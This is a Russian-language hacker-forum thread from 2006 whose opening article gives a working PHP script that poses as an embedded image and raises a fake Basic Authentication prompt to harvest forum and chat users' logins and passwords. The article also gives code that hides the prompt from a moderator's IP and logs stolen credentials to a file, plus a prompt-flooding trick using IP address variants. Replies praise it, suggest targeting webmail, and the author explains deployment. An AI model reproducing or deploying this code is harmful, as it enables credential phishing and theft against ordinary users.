Авторские статьи Применение Basic Authorization против форумов

Discussion in 'Статьи' started by hidden, 25 Jun 2006.

  1. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386













    [​IMG]






































    Я надеюсь, вы ввели не верные данные (не беспокойтесь то, что вы ввели, попало только на ту картинку, что на вашем экране), но если всёже верные это ещё раз даказывает возможности этого способа и эта статья поможет вам больше не покупаться на подобный метод авторизации, а вобще я ненашол статьи на подобную тему и решил написать.


    Данный метод авторизации применяется очень редко, из-за отсутствия шифрования передаваемых серверу данных, отсутствия возможности изменения интерфейса ввода данных, а также из-за того, что введённые данные ассоциируются только с той страницей, на которой проводилась авторизация.
    В основном он применяется аппаратными сетевыми средствами, например, для доступа к странице настроек, из-за простоты использования.


    Этот способ применяется к документам любого типа, значит, к картинкам он тоже применяется, да и даже к тем картинкам, которые расположены на веб-странице и даже на защищённой странице(которой многие люди доверяют), на страницах почтовых ящиков, форумов и чатов где имеется возможность вставлять картинки.


    Из предыдущего предложения сделаем вывод: Если применить этот метод в почитании с СИ, может что-то получиться.



    Первый способ: Стырить пароль у юзера. Это наиболее полезный способ.


    Закинув такую картинку в обычный форум или чат можно выловить некоторое количество логинов и паролей юзеров.


    И вот он скрипт.

    PHP:
    <?php
      
      header
    ("Content-type: image/png");

      
    $im imagecreate(25664);
      
      
    imagecolorallocate($im000);
      
      
    $green_color imagecolorallocate($im02550);
      
      
    imagerectangle($im0025563$green_color);
      
      
    $login $_SERVER['PHP_AUTH_USER'];
      
      
    $pass  $_SERVER['PHP_AUTH_PW'];
      
      if ((
    strlen($login)<3) || (strlen($pass)<1)){
      
        
    Header('HTTP/1.1 401 Unauthorized');
        
        
    Header('WWW-Authenticate: Basic realm="hidden"');
        
        
    imagestring($im26425"You're not authorized!"$green_color);
      
      } else {
      
        
    imagestring($im21616"Your login is '$login', and"$green_color);
        
        
    imagestring($im21636"your password is '$pass'"$green_color);
      
      }
      
      
    imagepng($im);
      
      
    imagedestroy($im);

    ?>

    Именно он применён перед началом данной статьи.

    Ты наверно скажешь, как только модератор это увидит, он сразу удалит эту картинку, если конечно он её увидит, для этого мы поставим фильтр, на IP адрес модера, для этого просто заменим эту строку


    PHP:
    if ((strlen($login)<3) || (strlen($pass)<1)){
    на

    PHP:
    if (((strlen($login)<3) || (strlen($pass)<1)) && ($_SERVER['REMOTE_ADDR']<>'127.0.0.1')){

    в данном случае 127.0.0.1 нужно заменить на реальный IP адрес модера, или модифицировать этот простенький скрипт, для фильтрации по спискам, думаю, если ты собераешся применять этот способ, значит, разберешься, как это сделать.


    Ну и естественно нужно сохранить полученные данные


    PHP:
    $fh=gzopen('pass.gz''a9');gzwrite($fh"$login:$pass\n");gzclose($fh);

    Если скрипт находится в корневой директории сайта, то лучше сохранять не в "pass.gz", а в "../pass.gz", чтобы нельзя было получить доступ к файлу из вэб.


    Второй способ: Что-то вроде флуда, только хуже.


    Если ты заметил, это модальное окно, значит пока его не закроешь нельзя продолжить пользоваться окном над которым оно открылось, ты скажешь, ну я просто закрою его и всего-то делов, а представь я вставил 50 таких картинок, и каждую придётся закрывать.


    И так, мы сталкиваемся с такой проблемой, браузер привязывает эти данные к тому хосту(не странице, а хосту), с которого открыл, и чтобы обойти это нам потребуется личный IP, что не даёт нам бесплатный хостинг.


    Зачем? А затем, что для браузера 127.0.0.1, 127.00.0.1, 127.0.00.1, 127.0.0.01 и даже 0177.0.0.1, последний ведёт туда же просто первый байт переведён восьмеричную систему счисления, также можно перекодировать её в HEX - 0x7f или 7fh, а вообще нулей перед цифрой в восьмеричной системе можно писать сколько угодно 127.0.000000000000.1, 00000000000177.0.0.1, но для браузера это разные хосты, потому что привязка текстовая.


    Заметь:
    -
    Приведённый скрипт, это скрипт PHP, его надо вставить в любой текстовый редактор и сохранить в формате php(не png, иначе придётся править .htaccess).
    - Результатом этого скрипта, получается, не страница, а картинка, которую можно вставить [​IMG], или <img src="сюда">.


    Решение проблемы: Я не представляю способов решения, кроме отключения картинок, но ведь это не выход. Убить двух яайцев избавиться от баннеров и лишних картинок можно установкой FireFox + Adblock plugin-а, это то, что я и делаю.



    hidden специально для AntiChat
     
    #1 hidden, 25 Jun 2006
    Last edited: 5 Apr 2007
    26 people like this.
  2. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Я прочитал твою статью и честно говоря она мне не понравилась :-(


    Посмотрим что другие люди скажут
     
  3. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Тыбы написал что тебе непонравилось, раз уж начал, а так не**р флудить.
     
    1 person likes this.
  4. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Ты мог бы обьяснить весь этот код (я знаю PHP поэтому я понял но я уверен что некоторые его не знают) :
    А не несколько строчек
     
  5. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Мне кажется все поняли...
     
  6. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Для тех кто хоть немного знает инглиш и какой небудь язык програмирования, будет достаточно понятно чтоб применить, если нет пусть читают Руководство по PHP, а если кто-то нехочет и непонимает, нах тогда ему эта тема.
     
    1 person likes this.
  7. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    прикинь даже и не задумывался что так мона тырить ))
     
    1 person likes this.
  8. nerezus

    nerezus Banned

    Joined:
    12 Aug 2004
    Messages:
    3,192
    Likes Received:
    727
    Reputations:
    266
    боян, но расписан хорошо )
     
    1 person likes this.
  9. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Ничего подобного, сам придумал, сам написал! Если ктото до меня это придумал, это не значит, что я у него содрал, приведи пример, откуда можно взять такую статью и на сколько она будет похожа на мою.

    И вообще, я никогда ничего не сдираю!
     
    #9 hidden, 25 Jun 2006
    Last edited: 25 Jun 2006
    1 person likes this.
  10. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    Блин это мега статья, конечно вероятность ввода юзером пароля не очень высока, однако аффтор забыл про веб-интерфэйсы мыльников, там никаких модеров нету. Вобщем 5+, вернее 3.
    Я думаю даже gmail.com не устоит. Давайте название этому всему придумаем.
     
  11. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Thax :) , а про мыльники я не забыл и не только про мыльники, я упоминал это, просто не углублялся, и так понятно.

    Название? Я думал над этим но придумал только "Basic Authorization против форумов".
     
    4 people like this.
  12. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,074
    Likes Received:
    1,528
    Reputations:
    1,126
    Basic Authorization Exchange
    Basic Authorization Engeering
    хых))хз с названием)) но способ оригинальный..
     
  13. Rabid Rabbit

    Rabid Rabbit Elder - Старейшина

    Joined:
    31 Aug 2003
    Messages:
    162
    Likes Received:
    15
    Reputations:
    -9
    Мля таки почетал.
    Майо придлажение выкинь Базик нах ваще из названия сбевает нимнога не в ту степь сразу асоцеации или с миме или с висуал васиком=)
     
  14. back0rifice

    back0rifice Active Member

    Joined:
    16 Mar 2006
    Messages:
    328
    Likes Received:
    107
    Reputations:
    19
    В принципе, мне понравилось. Я так понял - хотя, может, и не совсем верно :) -, что здесь идёт речь о PHP-including'e в само изображение ;) ?

    Догнал (просто пришёл по link'у с КВИПа, поэтому окна авторизации не прочухал)... hidden, молодца!
     
    #14 back0rifice, 26 Jun 2006
    Last edited: 26 Jun 2006
  15. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    Первоисточник идеи, я так понимаю, http://forum.antichat.ru/thread20445.html

    Вероятно ачатовцы не очень внимательны, ибо после прочтения топика "Досим топик" - до того, что написал хидын, догадаться должен был каждый...
    P>S>используйте мозгъ...
    P>S>S>ИМХО - слабо для статьи...
     
  16. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Не знаю, что было в той картинке, первый раз вижу этот пост, а идея лично моя, у меня безпроводной ротор такие хрени выдаёт, вот я и решил, применить.
    "Досим" - юмарист. Ты знаешь что такое досить? Какое в топике обарудование? Что отказало?
     
    #16 hidden, 27 Jun 2006
    Last edited: 27 Jun 2006
  17. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    если действительно твоя, то яничего не имею против.
    "ты хочешь поговорить об этом?"(це)
    Ты начинаешь негодовать и кидаться словами - что не есть гуд, теперь ты понимаешь мое негодование, когда я увидел ето...и подумал, что этот наглый плагиат(не в чистом виде). :)
    P>S>DOS - Денайед оф сёрвис...
    сёрвис - энто предоставление услуг(с англ).
    денайед - отказ(с англ).
    форум предоставляет услуги для получения информации, топик в частности.
    Соответственно, отказ обслуживания топика - это есть отказ в сервисе предоставления информации.
     
    #17 Xex, 27 Jun 2006
    Last edited: 27 Jun 2006
  18. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Понимаешь, плагиат - это когда один переписывает у другово, и при этом говорит, что это его, а вот когда в статью пишут, что это плагиат, с поста из 4х строк, это уже клевита.
     
    1 person likes this.
  19. alex-19841

    alex-19841 Elder - Старейшина

    Joined:
    31 Mar 2006
    Messages:
    57
    Likes Received:
    0
    Reputations:
    -2
    а куда этот код вставлять? Чтоб он рабоьал. Пробовал в notepad вставить, а его переименовал в png при открытии картинки был просто показан php код
     
  20. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Этот код переименовывать не в png а в php надо и заливать на хоспинг с поддержкой PHP и GD, а потом с сайта открывать.
    ещё можешь апач поставить, но лучьше хостинг (к примеру тот что у меня в примере).
     
    #20 hidden, 27 Jun 2006
    Last edited: 27 Jun 2006
Loading...